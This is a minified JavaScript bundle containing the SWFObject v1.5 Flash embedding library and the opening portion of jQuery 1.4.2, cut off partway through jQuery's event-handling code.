// SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: http://www.opensource.org/licenses/mit-license.php
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

/*!
 * jQuery JavaScript Library v1.4.2
 * http://jquery.com/
 *
 * Copyright 2010, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2010, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Sat Feb 13 22:33:48 2010 -0500
 */
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o],o,e(a[o],b)):d,j);return a}return i?
e(a[0],b):w}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function na(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function oa(a){var b,d=[],f=[],e=arguments,j,i,o,k,n,r;i=c.data(this,"events");if(!(a.liveFired===this||!i||!i.live||a.button&&a.type==="click")){a.liveFired=this;var u=i.live.slice(0);for(k=0;k<u.length;k++){i=u[k];i.origType.replace(O,"")===a.type?f.push(i.selector):u.splice(k--,1)}j=c(a.target).closest(f,a.currentTarget);n=0;for(r=
j.length;n<r;n++)for(k=0;k<u.length;k++){i=u[k];if(j[n].selector===i.selector){o=j[n].elem;f=null;if(i.preType==="mouseenter"||i.preType==="mouseleave")f=c(a.relatedTarget).closest(i.selector)[0];if(!f||f!==o)d.push({elem:o,handleObj:i})}}n=0;for(r=d.length;n<r;n++){j=d[n];a.currentTarget=j.elem;a.data=j.handleObj.data;a.handleObj=j.handleObj;if(j.handleObj.origHandler.apply(j.elem,e)===false){b=false;break}}return b}}function pa(a,b){return"live."+(a&&a!=="*"?a+".":"")+b.replace(/\./g,"`").replace(/ /g,
"&")}function qa(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function ra(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var j in f)for(var i in f[j])c.event.add(this,j,f[j][i],f[j][i].data)}}})}function sa(a,b,d){var f,e,j;b=b&&b[0]?b[0].ownerDocument||b[0]:s;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&b===s&&!ta.test(a[0])&&(c.support.checkClone||!ua.test(a[0]))){e=
true;if(j=c.fragments[a[0]])if(j!==1)f=j}if(!f){f=b.createDocumentFragment();c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=j?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(va.concat.apply([],va.slice(0,b)),function(){d[this]=a});return d}function wa(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Ra=A.jQuery,Sa=A.$,s=A.document,T,Ta=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Ua=/^.[^:#\[\.,]*$/,Va=/\S/,
Wa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Xa=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,P=navigator.userAgent,xa=false,Q=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,R=Array.prototype.slice,ya=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!b){this.context=s;this[0]=s.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=Ta.exec(a))&&
(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:s;if(a=Xa.exec(a))if(c.isPlainObject(b)){a=[s.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=sa([d[1]],[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}return c.merge(this,a)}else{if(b=s.getElementById(d[2])){if(b.id!==d[2])return T.find(a);this.length=1;this[0]=b}this.context=s;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=s;a=s.getElementsByTagName(a);return c.merge(this,
a)}else return!b||b.jquery?(b||T).find(a):c(b).find(a);else if(c.isFunction(a))return T.ready(a);if(a.selector!==w){this.selector=a.selector;this.context=a.context}return c.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return R.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){var f=c();c.isArray(a)?ba.apply(f,a):c.merge(f,a);f.prevObject=this;f.context=this.context;if(b===
"find")f.selector=this.selector+(this.selector?" ":"")+d;else if(b)f.selector=this.selector+"."+b+"("+d+")";return f},each:function(a,b){return c.each(this,a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(s,c);else Q&&Q.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(R.apply(this,arguments),"slice",R.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this,
function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,j,i,o;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(j in e){i=a[j];o=e[j];if(a!==o)if(f&&o&&(c.isPlainObject(o)||c.isArray(o))){i=i&&(c.isPlainObject(i)||
c.isArray(i))?i:c.isArray(o)?[]:{};a[j]=c.extend(f,i,o)}else if(o!==w)a[j]=o}return a};c.extend({noConflict:function(a){A.$=Sa;if(a)A.jQuery=Ra;return c},isReady:false,ready:function(){if(!c.isReady){if(!s.body)return setTimeout(c.ready,13);c.isReady=true;if(Q){for(var a,b=0;a=Q[b++];)a.call(s,c);Q=null}c.fn.triggerHandler&&c(s).triggerHandler("ready")}},bindReady:function(){if(!xa){xa=true;if(s.readyState==="complete")return c.ready();if(s.addEventListener){s.addEventListener("DOMContentLoaded",
L,false);A.addEventListener("load",c.ready,false)}else if(s.attachEvent){s.attachEvent("onreadystatechange",L);A.attachEvent("onload",c.ready);var a=false;try{a=A.frameElement==null}catch(b){}s.documentElement.doScroll&&a&&ma()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype,
"isPrototypeOf"))return false;var b;for(b in a);return b===w||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=c.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return A.JSON&&A.JSON.parse?A.JSON.parse(a):(new Function("return "+
a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Va.test(a)){var b=s.getElementsByTagName("head")[0]||s.documentElement,d=s.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(s.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,j=a.length,i=j===w||c.isFunction(a);if(d)if(i)for(f in a){if(b.apply(a[f],
d)===false)break}else for(;e<j;){if(b.apply(a[e++],d)===false)break}else if(i)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=a[0];e<j&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Wa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]===
a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==w;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,j=a.length;e<j;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,j=0,i=a.length;j<i;j++){e=b(a[j],j,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=w}else if(b&&
!c.isFunction(b)){d=b;b=w}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});P=c.uaMatch(P);if(P.browser){c.browser[P.browser]=true;c.browser.version=P.version}if(c.browser.webkit)c.browser.safari=
true;if(ya)c.inArray=function(a,b){return ya.call(b,a)};T=c(s);if(s.addEventListener)L=function(){s.removeEventListener("DOMContentLoaded",L,false);c.ready()};else if(s.attachEvent)L=function(){if(s.readyState==="complete"){s.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=s.documentElement,b=s.createElement("script"),d=s.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";
var e=d.getElementsByTagName("*"),j=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!j)){c.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(j.getAttribute("style")),hrefNormalized:j.getAttribute("href")==="/a",opacity:/^0.55$/.test(j.style.opacity),cssFloat:!!j.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:s.createElement("select").appendChild(s.createElement("option")).selected,
parentNode:d.removeChild(d.appendChild(s.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};b.type="text/javascript";try{b.appendChild(s.createTextNode("window."+f+"=1;"))}catch(i){}a.insertBefore(b,a.firstChild);if(A[f]){c.support.scriptEval=true;delete A[f]}try{delete b.test}catch(o){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function k(){c.support.noCloneEvent=
false;d.detachEvent("onclick",k)});d.cloneNode(true).fireEvent("onclick")}d=s.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=s.createDocumentFragment();a.appendChild(d.firstChild);c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var k=s.createElement("div");k.style.width=k.style.paddingLeft="1px";s.body.appendChild(k);c.boxModel=c.support.boxModel=k.offsetWidth===2;s.body.removeChild(k).style.display="none"});a=function(k){var n=
s.createElement("div");k="on"+k;var r=k in n;if(!r){n.setAttribute(k,"return;");r=typeof n[k]==="function"}return r};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=j=null}})();c.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ya=0,za={};c.extend({cache:{},expando:G,noData:{embed:true,object:true,
applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var f=a[G],e=c.cache;if(!f&&typeof b==="string"&&d===w)return null;f||(f=++Ya);if(typeof b==="object"){a[G]=f;e[f]=c.extend(true,{},b)}else if(!e[f]){a[G]=f;e[f]={}}a=e[f];if(d!==w)a[b]=d;return typeof b==="string"?a[b]:a}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{if(c.support.deleteExpando)delete a[c.expando];
else a.removeAttribute&&a.removeAttribute(c.expando);delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===w){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===w&&this.length)f=c.data(this[0],a);return f===w&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this,
a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b===
w)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var Aa=/[\n\t]/g,ca=/\s+/,Za=/\r/g,$a=/href|src|style/,ab=/(button|input)/i,bb=/(button|input|object|select|textarea)/i,
cb=/^(a|area)$/i,Ba=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(n){var r=c(this);r.addClass(a.call(this,n,r.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var j=" "+e.className+" ",
i=e.className,o=0,k=b.length;o<k;o++)if(j.indexOf(" "+b[o]+" ")<0)i+=" "+b[o];e.className=c.trim(i)}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(k){var n=c(this);n.removeClass(a.call(this,k,n.attr("class")))});if(a&&typeof a==="string"||a===w)for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var j=(" "+e.className+" ").replace(Aa," "),i=0,o=b.length;i<o;i++)j=j.replace(" "+b[i]+" ",
" ");e.className=c.trim(j)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var j=c(this);j.toggleClass(a.call(this,e,j.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,j=0,i=c(this),o=b,k=a.split(ca);e=k[j++];){o=f?o:!i.hasClass(e);i[o?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className=
this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(Aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===w){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var j=b?d:0;for(d=b?d+1:e.length;j<d;j++){var i=
e[j];if(i.selected){a=c(i).val();if(b)return a;f.push(a)}}return f}if(Ba.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Za,"")}return w}var o=c.isFunction(a);return this.each(function(k){var n=c(this),r=a;if(this.nodeType===1){if(o)r=a.call(this,k,n.val());if(typeof r==="number")r+="";if(c.isArray(r)&&Ba.test(this.type))this.checked=c.inArray(n.val(),r)>=0;else if(c.nodeName(this,"select")){var u=c.makeArray(r);c("option",this).each(function(){this.selected=
c.inArray(c(this).val(),u)>=0});if(!u.length)this.selectedIndex=-1}else this.value=r}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return w;if(f&&b in c.attrFn)return c(a)[b](d);f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==w;b=f&&c.props[b]||b;if(a.nodeType===1){var j=$a.test(b);if(b in a&&f&&!j){if(e){b==="type"&&ab.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");
a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:bb.test(a.nodeName)||cb.test(a.nodeName)&&a.href?0:w;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&j?a.getAttribute(b,2):a.getAttribute(b);return a===null?w:a}return c.style(a,b,d)}});var O=/\.(.*)$/,db=function(a){return a.replace(/[^\w\s\.\|`]/g,
function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==A&&!a.frameElement)a=A;var e,j;if(d.handler){e=d;d=e.handler}if(!d.guid)d.guid=c.guid++;if(j=c.data(a)){var i=j.events=j.events||{},o=j.handle;if(!o)j.handle=o=function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(o.elem,arguments):w};o.elem=a;b=b.split(" ");for(var k,n=0,r;k=b[n++];){j=e?c.extend({},e):{handler:d,data:f};if(k.indexOf(".")>-1){r=k.split(".");
k=r.shift();j.namespace=r.slice(0).sort().join(".")}else{r=[];j.namespace=""}j.type=k;j.guid=d.guid;var u=i[k],z=c.event.special[k]||{};if(!u){u=i[k]=[];if(!z.setup||z.setup.call(a,f,r,o)===false)if(a.addEventListener)a.addEventListener(k,o,false);else a.attachEvent&&a.attachEvent("on"+k,o)}if(z.add){z.add.call(a,j);if(!j.handler.guid)j.handler.guid=d.guid}u.push(j);c.event.global[k]=true}a=null}}},global:{},remove:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){var e,j=0,i,o,k,n,r,u,z=c.data(a),
C=z&&z.events;if(z&&C){if(b&&b.type){d=b.handler;b=b.type}if(!b||typeof b==="string"&&b.charAt(0)==="."){b=b||"";for(e in C)c.event.remove(a,e+b)}else{for(b=b.split(" ");e=b[j++];){n=e;i=e.indexOf(".")<0;o=[];if(!i){o=e.split(".");e=o.shift();k=new RegExp("(^|\\.)"+c.map(o.slice(0).sort(),db).join("\\.(?:.*\\.)?")+"(\\.|$)")}if(r=C[e])if(d){n=c.event.special[e]||{};for(B=f||0;B<r.length;B++){u=r[B];if(d.guid===u.guid){if(i||k.test(u.namespace)){f==null&&r.splice(B--,1);n.remove&&n.remove.call(a,u)}if(f!=
null)break}}if(r.length===0||f!=null&&r.length===1){if(!n.teardown||n.teardown.call(a,o)===false)Ca(a,e,z.handle);delete C[e]}}else for(var B=0;B<r.length;B++){u=r[B];if(i||k.test(u.namespace)){c.event.remove(a,n,u.handler,B);r.splice(B--,1)}}}if(c.isEmptyObject(C)){if(b=z.handle)b.elem=null;delete z.events;delete z.handle;c.isEmptyObject(z)&&c.removeData(a)}}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type=
e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();c.event.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return w;a.result=w;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(j){}if(!a.isPropagationStopped()&&
f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){f=a.target;var i,o=c.nodeName(f,"a")&&e==="click",k=c.event.special[e]||{};if((!k._default||k._default.call(d,a)===false)&&!o&&!(f&&f.nodeName&&c.noData[f.nodeName.toLowerCase()])){try{if(f[e]){if(i=f["on"+e])f["on"+e]=null;c.event.triggered=true;f[e]()}}catch(n){}if(i)f["on"+e]=i;c.event.triggered=false}}},handle:function(a){var b,d,f,e;a=arguments[0]=c.event.fix(a||A.event);a.currentTarget=this;b=a.type.indexOf(".")<0&&!a.exclusive;
if(!b){d=a.type.split(".");a.type=d.shift();f=new RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)")}e=c.data(this,"events");d=e[a.type];if(e&&d){d=d.slice(0);e=0;for(var j=d.length;e<j;e++){var i=d[e];if(b||f.test(i.namespace)){a.handler=i.handler;a.data=i.data;a.handleObj=i;i=i.handler.apply(this,arguments);if(i!==w){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),
